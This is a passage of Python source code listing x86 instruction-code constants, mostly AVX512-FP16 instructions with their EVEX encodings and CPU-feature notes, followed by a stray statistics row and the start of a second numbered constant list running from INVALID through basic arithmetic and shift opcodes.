``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VGETEXPPH_YMM_K1Z_YMMM256B16: int = 4505
"""
``VGETEXPPH ymm1 {k1}{z}, ymm2/m256/m16bcst``
``EVEX.256.66.MAP6.W0 42 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VGETEXPPH_ZMM_K1Z_ZMMM512B16_SAE: int = 4506
"""
``VGETEXPPH zmm1 {k1}{z}, zmm2/m512/m16bcst{sae}``
``EVEX.512.66.MAP6.W0 42 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VGETEXPSH_XMM_K1Z_XMM_XMMM16_SAE: int = 4507
"""
``VGETEXPSH xmm1 {k1}{z}, xmm2, xmm3/m16{sae}``
``EVEX.LIG.66.MAP6.W0 43 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VGETMANTPH_XMM_K1Z_XMMM128B16_IMM8: int = 4508
"""
``VGETMANTPH xmm1 {k1}{z}, xmm2/m128/m16bcst, imm8``
``EVEX.128.0F3A.W0 26 /r ib``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VGETMANTPH_YMM_K1Z_YMMM256B16_IMM8: int = 4509
"""
``VGETMANTPH ymm1 {k1}{z}, ymm2/m256/m16bcst, imm8``
``EVEX.256.0F3A.W0 26 /r ib``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VGETMANTPH_ZMM_K1Z_ZMMM512B16_IMM8_SAE: int = 4510
"""
``VGETMANTPH zmm1 {k1}{z}, zmm2/m512/m16bcst{sae}, imm8``
``EVEX.512.0F3A.W0 26 /r ib``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VGETMANTSH_XMM_K1Z_XMM_XMMM16_IMM8_SAE: int = 4511
"""
``VGETMANTSH xmm1 {k1}{z}, xmm2, xmm3/m16{sae}, imm8``
``EVEX.LIG.0F3A.W0 27 /r ib``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMAXPH_XMM_K1Z_XMM_XMMM128B16: int = 4512
"""
``VMAXPH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.MAP5.W0 5F /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMAXPH_YMM_K1Z_YMM_YMMM256B16: int = 4513
"""
``VMAXPH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.MAP5.W0 5F /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMAXPH_ZMM_K1Z_ZMM_ZMMM512B16_SAE: int = 4514
"""
``VMAXPH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{sae}``
``EVEX.512.MAP5.W0 5F /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMAXSH_XMM_K1Z_XMM_XMMM16_SAE: int = 4515
"""
``VMAXSH xmm1 {k1}{z}, xmm2, xmm3/m16{sae}``
``EVEX.LIG.F3.MAP5.W0 5F /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMINPH_XMM_K1Z_XMM_XMMM128B16: int = 4516
"""
``VMINPH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.MAP5.W0 5D /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMINPH_YMM_K1Z_YMM_YMMM256B16: int = 4517
"""
``VMINPH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.MAP5.W0 5D /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMINPH_ZMM_K1Z_ZMM_ZMMM512B16_SAE: int = 4518
"""
``VMINPH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{sae}``
``EVEX.512.MAP5.W0 5D /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMINSH_XMM_K1Z_XMM_XMMM16_SAE: int = 4519
"""
``VMINSH xmm1 {k1}{z}, xmm2, xmm3/m16{sae}``
``EVEX.LIG.F3.MAP5.W0 5D /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMOVSH_XMM_K1Z_M16: int = 4520
"""
``VMOVSH xmm1 {k1}{z}, m16``
``EVEX.LIG.F3.MAP5.W0 10 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMOVSH_M16_K1_XMM: int = 4521
"""
``VMOVSH m16 {k1}, xmm1``
``EVEX.LIG.F3.MAP5.W0 11 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMOVSH_XMM_K1Z_XMM_XMM: int = 4522
"""
``VMOVSH xmm1 {k1}{z}, xmm2, xmm3``
``EVEX.LIG.F3.MAP5.W0 10 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMOVSH_XMM_K1Z_XMM_XMM_MAP5_11: int = 4523
"""
``VMOVSH xmm1 {k1}{z}, xmm2, xmm3``
``EVEX.LIG.F3.MAP5.W0 11 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMOVW_XMM_R32M16: int = 4524
"""
``VMOVW xmm1, r32/m16``
``EVEX.128.66.MAP5.W0 6E /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMOVW_XMM_R64M16: int = 4525
"""
``VMOVW xmm1, r64/m16``
``EVEX.128.66.MAP5.W1 6E /r``
``AVX512-FP16``
``64-bit``
"""
EVEX_VMOVW_R32M16_XMM: int = 4526
"""
``VMOVW r32/m16, xmm1``
``EVEX.128.66.MAP5.W0 7E /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMOVW_R64M16_XMM: int = 4527
"""
``VMOVW r64/m16, xmm1``
``EVEX.128.66.MAP5.W1 7E /r``
``AVX512-FP16``
``64-bit``
"""
EVEX_VMULPH_XMM_K1Z_XMM_XMMM128B16: int = 4528
"""
``VMULPH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.MAP5.W0 59 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMULPH_YMM_K1Z_YMM_YMMM256B16: int = 4529
"""
``VMULPH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.MAP5.W0 59 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMULPH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4530
"""
``VMULPH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.MAP5.W0 59 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VMULSH_XMM_K1Z_XMM_XMMM16_ER: int = 4531
"""
``VMULSH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.F3.MAP5.W0 59 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VRCPPH_XMM_K1Z_XMMM128B16: int = 4532
"""
``VRCPPH xmm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.128.66.MAP6.W0 4C /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VRCPPH_YMM_K1Z_YMMM256B16: int = 4533
"""
``VRCPPH ymm1 {k1}{z}, ymm2/m256/m16bcst``
``EVEX.256.66.MAP6.W0 4C /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VRCPPH_ZMM_K1Z_ZMMM512B16: int = 4534
"""
``VRCPPH zmm1 {k1}{z}, zmm2/m512/m16bcst``
``EVEX.512.66.MAP6.W0 4C /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VRCPSH_XMM_K1Z_XMM_XMMM16: int = 4535
"""
``VRCPSH xmm1 {k1}{z}, xmm2, xmm3/m16``
``EVEX.LIG.66.MAP6.W0 4D /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VREDUCEPH_XMM_K1Z_XMMM128B16_IMM8: int = 4536
"""
``VREDUCEPH xmm1 {k1}{z}, xmm2/m128/m16bcst, imm8``
``EVEX.128.0F3A.W0 56 /r ib``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VREDUCEPH_YMM_K1Z_YMMM256B16_IMM8: int = 4537
"""
``VREDUCEPH ymm1 {k1}{z}, ymm2/m256/m16bcst, imm8``
``EVEX.256.0F3A.W0 56 /r ib``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VREDUCEPH_ZMM_K1Z_ZMMM512B16_IMM8_SAE: int = 4538
"""
``VREDUCEPH zmm1 {k1}{z}, zmm2/m512/m16bcst{sae}, imm8``
``EVEX.512.0F3A.W0 56 /r ib``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VREDUCESH_XMM_K1Z_XMM_XMMM16_IMM8_SAE: int = 4539
"""
``VREDUCESH xmm1 {k1}{z}, xmm2, xmm3/m16{sae}, imm8``
``EVEX.LIG.0F3A.W0 57 /r ib``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VRNDSCALEPH_XMM_K1Z_XMMM128B16_IMM8: int = 4540
"""
``VRNDSCALEPH xmm1 {k1}{z}, xmm2/m128/m16bcst, imm8``
``EVEX.128.0F3A.W0 08 /r ib``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VRNDSCALEPH_YMM_K1Z_YMMM256B16_IMM8: int = 4541
"""
``VRNDSCALEPH ymm1 {k1}{z}, ymm2/m256/m16bcst, imm8``
``EVEX.256.0F3A.W0 08 /r ib``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VRNDSCALEPH_ZMM_K1Z_ZMMM512B16_IMM8_SAE: int = 4542
"""
``VRNDSCALEPH zmm1 {k1}{z}, zmm2/m512/m16bcst{sae}, imm8``
``EVEX.512.0F3A.W0 08 /r ib``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VRNDSCALESH_XMM_K1Z_XMM_XMMM16_IMM8_SAE: int = 4543
"""
``VRNDSCALESH xmm1 {k1}{z}, xmm2, xmm3/m16{sae}, imm8``
``EVEX.LIG.0F3A.W0 0A /r ib``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VRSQRTPH_XMM_K1Z_XMMM128B16: int = 4544
"""
``VRSQRTPH xmm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.128.66.MAP6.W0 4E /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VRSQRTPH_YMM_K1Z_YMMM256B16: int = 4545
"""
``VRSQRTPH ymm1 {k1}{z}, ymm2/m256/m16bcst``
``EVEX.256.66.MAP6.W0 4E /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VRSQRTPH_ZMM_K1Z_ZMMM512B16: int = 4546
"""
``VRSQRTPH zmm1 {k1}{z}, zmm2/m512/m16bcst``
``EVEX.512.66.MAP6.W0 4E /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VRSQRTSH_XMM_K1Z_XMM_XMMM16: int = 4547
"""
``VRSQRTSH xmm1 {k1}{z}, xmm2, xmm3/m16``
``EVEX.LIG.66.MAP6.W0 4F /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VSCALEFPH_XMM_K1Z_XMM_XMMM128B16: int = 4548
"""
``VSCALEFPH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 2C /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VSCALEFPH_YMM_K1Z_YMM_YMMM256B16: int = 4549
"""
``VSCALEFPH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 2C /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VSCALEFPH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4550
"""
``VSCALEFPH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 2C /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VSCALEFSH_XMM_K1Z_XMM_XMMM16_ER: int = 4551
"""
``VSCALEFSH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.66.MAP6.W0 2D /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VSQRTPH_XMM_K1Z_XMMM128B16: int = 4552
"""
``VSQRTPH xmm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.128.MAP5.W0 51 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VSQRTPH_YMM_K1Z_YMMM256B16: int = 4553
"""
``VSQRTPH ymm1 {k1}{z}, ymm2/m256/m16bcst``
``EVEX.256.MAP5.W0 51 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VSQRTPH_ZMM_K1Z_ZMMM512B16_ER: int = 4554
"""
``VSQRTPH zmm1 {k1}{z}, zmm2/m512/m16bcst{er}``
``EVEX.512.MAP5.W0 51 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VSQRTSH_XMM_K1Z_XMM_XMMM16_ER: int = 4555
"""
``VSQRTSH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.F3.MAP5.W0 51 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VSUBPH_XMM_K1Z_XMM_XMMM128B16: int = 4556
"""
``VSUBPH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.MAP5.W0 5C /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VSUBPH_YMM_K1Z_YMM_YMMM256B16: int = 4557
"""
``VSUBPH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.MAP5.W0 5C /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VSUBPH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4558
"""
``VSUBPH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.MAP5.W0 5C /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VSUBSH_XMM_K1Z_XMM_XMMM16_ER: int = 4559
"""
``VSUBSH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.F3.MAP5.W0 5C /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VUCOMISH_XMM_XMMM16_SAE: int = 4560
"""
``VUCOMISH xmm1, xmm2/m16{sae}``
``EVEX.LIG.MAP5.W0 2E /r``
``AVX512-FP16``
``16/32/64-bit``
"""
RDUDBG: int = 4561
"""
``RDUDBG``
``0F 0E``
``UDBG``
``16/32/64-bit``
"""
WRUDBG: int = 4562
"""
``WRUDBG``
``0F 0F``
``UDBG``
``16/32/64-bit``
"""
| 13.336432 | 131 | 0.606806 |
INVALID: int = 0
DECLAREBYTE: int = 1
DECLAREWORD: int = 2
DECLAREDWORD: int = 3
DECLAREQWORD: int = 4
ADD_RM8_R8: int = 5
ADD_RM16_R16: int = 6
ADD_RM32_R32: int = 7
ADD_RM64_R64: int = 8
ADD_R8_RM8: int = 9
ADD_R16_RM16: int = 10
ADD_R32_RM32: int = 11
ADD_R64_RM64: int = 12
ADD_AL_IMM8: int = 13
ADD_AX_IMM16: int = 14
ADD_EAX_IMM32: int = 15
ADD_RAX_IMM32: int = 16
PUSHW_ES: int = 17
PUSHD_ES: int = 18
POPW_ES: int = 19
POPD_ES: int = 20
OR_RM8_R8: int = 21
OR_RM16_R16: int = 22
OR_RM32_R32: int = 23
OR_RM64_R64: int = 24
OR_R8_RM8: int = 25
OR_R16_RM16: int = 26
OR_R32_RM32: int = 27
OR_R64_RM64: int = 28
OR_AL_IMM8: int = 29
OR_AX_IMM16: int = 30
OR_EAX_IMM32: int = 31
OR_RAX_IMM32: int = 32
PUSHW_CS: int = 33
PUSHD_CS: int = 34
POPW_CS: int = 35
ADC_RM8_R8: int = 36
ADC_RM16_R16: int = 37
ADC_RM32_R32: int = 38
ADC_RM64_R64: int = 39
ADC_R8_RM8: int = 40
ADC_R16_RM16: int = 41
ADC_R32_RM32: int = 42
ADC_R64_RM64: int = 43
ADC_AL_IMM8: int = 44
ADC_AX_IMM16: int = 45
ADC_EAX_IMM32: int = 46
ADC_RAX_IMM32: int = 47
PUSHW_SS: int = 48
PUSHD_SS: int = 49
POPW_SS: int = 50
POPD_SS: int = 51
SBB_RM8_R8: int = 52
SBB_RM16_R16: int = 53
SBB_RM32_R32: int = 54
SBB_RM64_R64: int = 55
SBB_R8_RM8: int = 56
SBB_R16_RM16: int = 57
SBB_R32_RM32: int = 58
SBB_R64_RM64: int = 59
SBB_AL_IMM8: int = 60
SBB_AX_IMM16: int = 61
SBB_EAX_IMM32: int = 62
SBB_RAX_IMM32: int = 63
PUSHW_DS: int = 64
PUSHD_DS: int = 65
POPW_DS: int = 66
POPD_DS: int = 67
AND_RM8_R8: int = 68
AND_RM16_R16: int = 69
AND_RM32_R32: int = 70
AND_RM64_R64: int = 71
AND_R8_RM8: int = 72
AND_R16_RM16: int = 73
AND_R32_RM32: int = 74
AND_R64_RM64: int = 75
AND_AL_IMM8: int = 76
AND_AX_IMM16: int = 77
AND_EAX_IMM32: int = 78
AND_RAX_IMM32: int = 79
DAA: int = 80
SUB_RM8_R8: int = 81
SUB_RM16_R16: int = 82
SUB_RM32_R32: int = 83
SUB_RM64_R64: int = 84
SUB_R8_RM8: int = 85
SUB_R16_RM16: int = 86
SUB_R32_RM32: int = 87
SUB_R64_RM64: int = 88
SUB_AL_IMM8: int = 89
SUB_AX_IMM16: int = 90
SUB_EAX_IMM32: int = 91
SUB_RAX_IMM32: int = 92
DAS: int = 93
XOR_RM8_R8: int = 94
XOR_RM16_R16: int = 95
XOR_RM32_R32: int = 96
XOR_RM64_R64: int = 97
XOR_R8_RM8: int = 98
XOR_R16_RM16: int = 99
XOR_R32_RM32: int = 100
XOR_R64_RM64: int = 101
XOR_AL_IMM8: int = 102
XOR_AX_IMM16: int = 103
XOR_EAX_IMM32: int = 104
XOR_RAX_IMM32: int = 105
AAA: int = 106
CMP_RM8_R8: int = 107
CMP_RM16_R16: int = 108
CMP_RM32_R32: int = 109
CMP_RM64_R64: int = 110
CMP_R8_RM8: int = 111
CMP_R16_RM16: int = 112
CMP_R32_RM32: int = 113
CMP_R64_RM64: int = 114
CMP_AL_IMM8: int = 115
CMP_AX_IMM16: int = 116
CMP_EAX_IMM32: int = 117
CMP_RAX_IMM32: int = 118
AAS: int = 119
INC_R16: int = 120
INC_R32: int = 121
DEC_R16: int = 122
DEC_R32: int = 123
PUSH_R16: int = 124
PUSH_R32: int = 125
PUSH_R64: int = 126
POP_R16: int = 127
POP_R32: int = 128
POP_R64: int = 129
PUSHAW: int = 130
PUSHAD: int = 131
POPAW: int = 132
POPAD: int = 133
BOUND_R16_M1616: int = 134
BOUND_R32_M3232: int = 135
ARPL_RM16_R16: int = 136
ARPL_R32M16_R32: int = 137
MOVSXD_R16_RM16: int = 138
MOVSXD_R32_RM32: int = 139
MOVSXD_R64_RM32: int = 140
PUSH_IMM16: int = 141
PUSHD_IMM32: int = 142
PUSHQ_IMM32: int = 143
IMUL_R16_RM16_IMM16: int = 144
IMUL_R32_RM32_IMM32: int = 145
IMUL_R64_RM64_IMM32: int = 146
PUSHW_IMM8: int = 147
PUSHD_IMM8: int = 148
PUSHQ_IMM8: int = 149
IMUL_R16_RM16_IMM8: int = 150
IMUL_R32_RM32_IMM8: int = 151
IMUL_R64_RM64_IMM8: int = 152
INSB_M8_DX: int = 153
INSW_M16_DX: int = 154
INSD_M32_DX: int = 155
OUTSB_DX_M8: int = 156
OUTSW_DX_M16: int = 157
OUTSD_DX_M32: int = 158
JO_REL8_16: int = 159
JO_REL8_32: int = 160
JO_REL8_64: int = 161
JNO_REL8_16: int = 162
JNO_REL8_32: int = 163
JNO_REL8_64: int = 164
JB_REL8_16: int = 165
JB_REL8_32: int = 166
JB_REL8_64: int = 167
JAE_REL8_16: int = 168
JAE_REL8_32: int = 169
JAE_REL8_64: int = 170
JE_REL8_16: int = 171
JE_REL8_32: int = 172
JE_REL8_64: int = 173
JNE_REL8_16: int = 174
JNE_REL8_32: int = 175
JNE_REL8_64: int = 176
JBE_REL8_16: int = 177
JBE_REL8_32: int = 178
JBE_REL8_64: int = 179
JA_REL8_16: int = 180
JA_REL8_32: int = 181
JA_REL8_64: int = 182
JS_REL8_16: int = 183
JS_REL8_32: int = 184
JS_REL8_64: int = 185
JNS_REL8_16: int = 186
JNS_REL8_32: int = 187
JNS_REL8_64: int = 188
JP_REL8_16: int = 189
JP_REL8_32: int = 190
JP_REL8_64: int = 191
JNP_REL8_16: int = 192
JNP_REL8_32: int = 193
JNP_REL8_64: int = 194
JL_REL8_16: int = 195
JL_REL8_32: int = 196
JL_REL8_64: int = 197
JGE_REL8_16: int = 198
JGE_REL8_32: int = 199
JGE_REL8_64: int = 200
JLE_REL8_16: int = 201
JLE_REL8_32: int = 202
JLE_REL8_64: int = 203
JG_REL8_16: int = 204
JG_REL8_32: int = 205
JG_REL8_64: int = 206
ADD_RM8_IMM8: int = 207
OR_RM8_IMM8: int = 208
ADC_RM8_IMM8: int = 209
SBB_RM8_IMM8: int = 210
AND_RM8_IMM8: int = 211
SUB_RM8_IMM8: int = 212
XOR_RM8_IMM8: int = 213
CMP_RM8_IMM8: int = 214
ADD_RM16_IMM16: int = 215
ADD_RM32_IMM32: int = 216
ADD_RM64_IMM32: int = 217
OR_RM16_IMM16: int = 218
OR_RM32_IMM32: int = 219
OR_RM64_IMM32: int = 220
ADC_RM16_IMM16: int = 221
ADC_RM32_IMM32: int = 222
ADC_RM64_IMM32: int = 223
SBB_RM16_IMM16: int = 224
SBB_RM32_IMM32: int = 225
SBB_RM64_IMM32: int = 226
AND_RM16_IMM16: int = 227
AND_RM32_IMM32: int = 228
AND_RM64_IMM32: int = 229
SUB_RM16_IMM16: int = 230
SUB_RM32_IMM32: int = 231
SUB_RM64_IMM32: int = 232
XOR_RM16_IMM16: int = 233
XOR_RM32_IMM32: int = 234
XOR_RM64_IMM32: int = 235
CMP_RM16_IMM16: int = 236
CMP_RM32_IMM32: int = 237
CMP_RM64_IMM32: int = 238
ADD_RM8_IMM8_82: int = 239
OR_RM8_IMM8_82: int = 240
ADC_RM8_IMM8_82: int = 241
SBB_RM8_IMM8_82: int = 242
AND_RM8_IMM8_82: int = 243
SUB_RM8_IMM8_82: int = 244
XOR_RM8_IMM8_82: int = 245
CMP_RM8_IMM8_82: int = 246
ADD_RM16_IMM8: int = 247
ADD_RM32_IMM8: int = 248
ADD_RM64_IMM8: int = 249
OR_RM16_IMM8: int = 250
OR_RM32_IMM8: int = 251
OR_RM64_IMM8: int = 252
ADC_RM16_IMM8: int = 253
ADC_RM32_IMM8: int = 254
ADC_RM64_IMM8: int = 255
SBB_RM16_IMM8: int = 256
SBB_RM32_IMM8: int = 257
SBB_RM64_IMM8: int = 258
AND_RM16_IMM8: int = 259
AND_RM32_IMM8: int = 260
AND_RM64_IMM8: int = 261
SUB_RM16_IMM8: int = 262
SUB_RM32_IMM8: int = 263
SUB_RM64_IMM8: int = 264
XOR_RM16_IMM8: int = 265
XOR_RM32_IMM8: int = 266
XOR_RM64_IMM8: int = 267
CMP_RM16_IMM8: int = 268
CMP_RM32_IMM8: int = 269
CMP_RM64_IMM8: int = 270
TEST_RM8_R8: int = 271
TEST_RM16_R16: int = 272
TEST_RM32_R32: int = 273
TEST_RM64_R64: int = 274
XCHG_RM8_R8: int = 275
XCHG_RM16_R16: int = 276
XCHG_RM32_R32: int = 277
XCHG_RM64_R64: int = 278
MOV_RM8_R8: int = 279
MOV_RM16_R16: int = 280
MOV_RM32_R32: int = 281
MOV_RM64_R64: int = 282
MOV_R8_RM8: int = 283
MOV_R16_RM16: int = 284
MOV_R32_RM32: int = 285
MOV_R64_RM64: int = 286
MOV_RM16_SREG: int = 287
MOV_R32M16_SREG: int = 288
MOV_R64M16_SREG: int = 289
LEA_R16_M: int = 290
LEA_R32_M: int = 291
LEA_R64_M: int = 292
MOV_SREG_RM16: int = 293
MOV_SREG_R32M16: int = 294
MOV_SREG_R64M16: int = 295
POP_RM16: int = 296
POP_RM32: int = 297
POP_RM64: int = 298
NOPW: int = 299
NOPD: int = 300
NOPQ: int = 301
XCHG_R16_AX: int = 302
XCHG_R32_EAX: int = 303
XCHG_R64_RAX: int = 304
PAUSE: int = 305
CBW: int = 306
CWDE: int = 307
CDQE: int = 308
CWD: int = 309
CDQ: int = 310
CQO: int = 311
CALL_PTR1616: int = 312
CALL_PTR1632: int = 313
WAIT: int = 314
PUSHFW: int = 315
PUSHFD: int = 316
PUSHFQ: int = 317
POPFW: int = 318
POPFD: int = 319
POPFQ: int = 320
SAHF: int = 321
LAHF: int = 322
MOV_AL_MOFFS8: int = 323
MOV_AX_MOFFS16: int = 324
MOV_EAX_MOFFS32: int = 325
MOV_RAX_MOFFS64: int = 326
MOV_MOFFS8_AL: int = 327
MOV_MOFFS16_AX: int = 328
MOV_MOFFS32_EAX: int = 329
MOV_MOFFS64_RAX: int = 330
MOVSB_M8_M8: int = 331
MOVSW_M16_M16: int = 332
MOVSD_M32_M32: int = 333
MOVSQ_M64_M64: int = 334
CMPSB_M8_M8: int = 335
CMPSW_M16_M16: int = 336
CMPSD_M32_M32: int = 337
CMPSQ_M64_M64: int = 338
TEST_AL_IMM8: int = 339
TEST_AX_IMM16: int = 340
TEST_EAX_IMM32: int = 341
TEST_RAX_IMM32: int = 342
STOSB_M8_AL: int = 343
STOSW_M16_AX: int = 344
STOSD_M32_EAX: int = 345
STOSQ_M64_RAX: int = 346
LODSB_AL_M8: int = 347
LODSW_AX_M16: int = 348
LODSD_EAX_M32: int = 349
LODSQ_RAX_M64: int = 350
SCASB_AL_M8: int = 351
SCASW_AX_M16: int = 352
SCASD_EAX_M32: int = 353
SCASQ_RAX_M64: int = 354
MOV_R8_IMM8: int = 355
MOV_R16_IMM16: int = 356
MOV_R32_IMM32: int = 357
MOV_R64_IMM64: int = 358
ROL_RM8_IMM8: int = 359
ROR_RM8_IMM8: int = 360
RCL_RM8_IMM8: int = 361
RCR_RM8_IMM8: int = 362
SHL_RM8_IMM8: int = 363
SHR_RM8_IMM8: int = 364
SAL_RM8_IMM8: int = 365
SAR_RM8_IMM8: int = 366
ROL_RM16_IMM8: int = 367
ROL_RM32_IMM8: int = 368
ROL_RM64_IMM8: int = 369
ROR_RM16_IMM8: int = 370
ROR_RM32_IMM8: int = 371
ROR_RM64_IMM8: int = 372
RCL_RM16_IMM8: int = 373
RCL_RM32_IMM8: int = 374
RCL_RM64_IMM8: int = 375
RCR_RM16_IMM8: int = 376
RCR_RM32_IMM8: int = 377
RCR_RM64_IMM8: int = 378
SHL_RM16_IMM8: int = 379
SHL_RM32_IMM8: int = 380
SHL_RM64_IMM8: int = 381
SHR_RM16_IMM8: int = 382
SHR_RM32_IMM8: int = 383
SHR_RM64_IMM8: int = 384
SAL_RM16_IMM8: int = 385
SAL_RM32_IMM8: int = 386
SAL_RM64_IMM8: int = 387
SAR_RM16_IMM8: int = 388
SAR_RM32_IMM8: int = 389
SAR_RM64_IMM8: int = 390
RETNW_IMM16: int = 391
RETND_IMM16: int = 392
RETNQ_IMM16: int = 393
RETNW: int = 394
RETND: int = 395
RETNQ: int = 396
LES_R16_M1616: int = 397
LES_R32_M1632: int = 398
LDS_R16_M1616: int = 399
LDS_R32_M1632: int = 400
MOV_RM8_IMM8: int = 401
XABORT_IMM8: int = 402
MOV_RM16_IMM16: int = 403
MOV_RM32_IMM32: int = 404
MOV_RM64_IMM32: int = 405
XBEGIN_REL16: int = 406
XBEGIN_REL32: int = 407
ENTERW_IMM16_IMM8: int = 408
ENTERD_IMM16_IMM8: int = 409
ENTERQ_IMM16_IMM8: int = 410
LEAVEW: int = 411
LEAVED: int = 412
LEAVEQ: int = 413
RETFW_IMM16: int = 414
RETFD_IMM16: int = 415
RETFQ_IMM16: int = 416
RETFW: int = 417
RETFD: int = 418
RETFQ: int = 419
INT3: int = 420
INT_IMM8: int = 421
INTO: int = 422
IRETW: int = 423
IRETD: int = 424
IRETQ: int = 425
ROL_RM8_1: int = 426
ROR_RM8_1: int = 427
RCL_RM8_1: int = 428
RCR_RM8_1: int = 429
SHL_RM8_1: int = 430
SHR_RM8_1: int = 431
SAL_RM8_1: int = 432
SAR_RM8_1: int = 433
ROL_RM16_1: int = 434
ROL_RM32_1: int = 435
ROL_RM64_1: int = 436
ROR_RM16_1: int = 437
ROR_RM32_1: int = 438
ROR_RM64_1: int = 439
RCL_RM16_1: int = 440
RCL_RM32_1: int = 441
RCL_RM64_1: int = 442
RCR_RM16_1: int = 443
RCR_RM32_1: int = 444
RCR_RM64_1: int = 445
SHL_RM16_1: int = 446
SHL_RM32_1: int = 447
SHL_RM64_1: int = 448
SHR_RM16_1: int = 449
SHR_RM32_1: int = 450
SHR_RM64_1: int = 451
SAL_RM16_1: int = 452
SAL_RM32_1: int = 453
SAL_RM64_1: int = 454
SAR_RM16_1: int = 455
SAR_RM32_1: int = 456
SAR_RM64_1: int = 457
ROL_RM8_CL: int = 458
ROR_RM8_CL: int = 459
RCL_RM8_CL: int = 460
RCR_RM8_CL: int = 461
SHL_RM8_CL: int = 462
SHR_RM8_CL: int = 463
SAL_RM8_CL: int = 464
SAR_RM8_CL: int = 465
ROL_RM16_CL: int = 466
ROL_RM32_CL: int = 467
ROL_RM64_CL: int = 468
ROR_RM16_CL: int = 469
ROR_RM32_CL: int = 470
ROR_RM64_CL: int = 471
RCL_RM16_CL: int = 472
